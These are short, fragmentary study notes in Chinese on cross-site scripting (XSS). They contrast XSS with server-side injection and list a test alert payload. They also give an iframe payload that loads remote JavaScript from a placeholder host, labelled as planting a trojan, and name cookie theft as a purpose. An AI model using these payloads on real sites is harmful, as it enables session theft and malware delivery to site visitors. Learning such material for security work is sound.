xss跨站:
注入主要针对服务端,跨站主要针对客户端,所有的输入点都是攻击源。
1.测试漏洞:<script>alert()</script>
2.挂马
<iframe src=http://ip/a.js></iframe>
POST方式要改成get
作用1:盗cookie
2.domain:路径